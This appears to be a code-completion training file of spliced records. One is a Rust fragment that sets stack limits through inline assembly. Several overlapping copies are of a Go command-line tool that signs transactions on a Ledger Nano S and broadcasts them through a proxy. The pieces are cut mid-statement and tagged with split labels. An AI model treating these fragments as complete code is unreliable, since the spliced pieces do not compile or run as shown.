pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
}
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $$0x48+90*4, %eax | unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq %gs:( | movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)] | random_line_split |
main.go | "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func | (tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpen | broadcastTransaction | identifier_name |
main.go | _data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() | {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil { | identifier_body | |
main.go | "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil |
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(err | {
return 0, err
} | conditional_block |
main.go | "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
